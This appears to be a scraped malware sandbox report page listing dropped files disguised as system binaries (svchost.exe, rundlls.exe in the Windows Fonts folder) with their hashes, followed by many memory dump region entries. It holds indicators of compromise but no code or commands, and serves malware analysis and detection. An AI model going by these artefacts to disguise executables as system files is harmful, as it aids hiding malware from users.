Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
memory/268-81-0x0000000000000000-mapping.dmp

Download
memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/272-77-0x0000000000000000-mapping.dmp

Download
memory/328-80-0x0000000000000000-mapping.dmp

Download
memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/384-73-0x0000000000000000-mapping.dmp

Download
memory/384-117-0x0000000000000000-mapping.dmp

Download
memory/392-92-0x0000000000000000-mapping.dmp

Download
memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/520-123-0x0000000000000000-mapping.dmp

Download
memory/560-63-0x0000000000000000-mapping.dmp

Download
memory/580-114-0x0000000000000000-mapping.dmp

Download
memory/580-64-0x0000000000000000-mapping.dmp

Download
memory/604-75-0x0000000000000000-mapping.dmp

Download
memory/624-57-0x0000000000000000-mapping.dmp

Download
memory/632-102-0x0000000000000000-mapping.dmp

Download
memory/632-67-0x0000000000000000-mapping.dmp

Download
memory/688-76-0x0000000000000000-mapping.dmp

Download
memory/696-91-0x0000000000000000-mapping.dmp

Download
memory/772-90-0x0000000000000000-mapping.dmp

Download
memory/832-70-0x0000000000000000-mapping.dmp

Download
memory/840-121-0x0000000000000000-mapping.dmp

Download
memory/896-56-0x0000000000000000-mapping.dmp

Download
memory/904-78-0x0000000000000000-mapping.dmp

Download
memory/940-122-0x0000000000000000-mapping.dmp

Download
memory/972-72-0x0000000000000000-mapping.dmp

Download
memory/996-119-0x0000000000000000-mapping.dmp

Download
memory/1108-111-0x0000000000000000-mapping.dmp

Download
memory/1168-68-0x0000000000000000-mapping.dmp

Download
memory/1216-59-0x0000000000000000-mapping.dmp

Download
memory/1216-88-0x0000000000000000-mapping.dmp

Download
memory/1280-112-0x0000000000000000-mapping.dmp

Download
memory/1352-125-0x0000000000000000-mapping.dmp

Download
memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1392-85-0x0000000000000000-mapping.dmp

Download
memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1412-127-0x0000000000000000-mapping.dmp

Download
memory/1412-74-0x0000000000000000-mapping.dmp

Download
memory/1436-69-0x0000000000000000-mapping.dmp

Download
memory/1460-65-0x0000000000000000-mapping.dmp

Download
memory/1488-118-0x0000000000000000-mapping.dmp

Download
memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/1516-95-0x0000000000250000-0x00000000002A3000-memory.dmp

Filesize
332KB

Download
memory/1516-54-0x00000000755A1000-0x00000000755A3000-memory.dmp

Filesize
8KB

Download
memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/1544-71-0x0000000000000000-mapping.dmp

Download
memory/1556-124-0x0000000000000000-mapping.dmp

Download
memory/1600-115-0x0000000000000000-mapping.dmp

Download
memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1652-66-0x0000000000000000-mapping.dmp

Download
memory/1720-116-0x0000000000000000-mapping.dmp

Download
memory/1784-55-0x0000000000000000-mapping.dmp

Download
memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/1796-108-0x0000000000000000-mapping.dmp

Download
memory/1804-58-0x0000000000000000-mapping.dmp

Download
memory/1960-126-0x0000000000000000-mapping.dmp

Download
memory/1960-62-0x0000000000000000-mapping.dmp

Download
memory/1984-113-0x0000000000000000-mapping.dmp

Download
memory/1984-89-0x0000000000000000-mapping.dmp

Download
memory/2020-103-0x0000000000000000-mapping.dmp

Download
memory/2028-120-0x0000000000000000-mapping.dmp

Download
memory/2028-61-0x0000000000000000-mapping.dmp

Download
memory/2032-60-0x0000000000000000-mapping.dmp

Download
memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2044-82-0x0000000000000000-mapping.dmp

Download
memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2120-133-0x0000000000000000-mapping.dmp

Download
memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2132-134-0x0000000000000000-mapping.dmp

Download
memory/2152-135-0x0000000000000000-mapping.dmp

Download
memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2180-137-0x0000000000000000-mapping.dmp

Download
memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2204-139-0x0000000000000000-mapping.dmp

Download
memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2232-143-0x0000000000000000-mapping.dmp

Download
memory/2276-145-0x0000000000000000-mapping.dmp

Download
memory/2336-149-0x0000000000000000-mapping.dmp

Download
memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2432-157-0x0000000000000000-mapping.dmp

Download
memory/2432-160-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/2460-161-0x0000000000000000-mapping.dmp

Download
memory/2496-162-0x0000000000000000-mapping.dmp

Download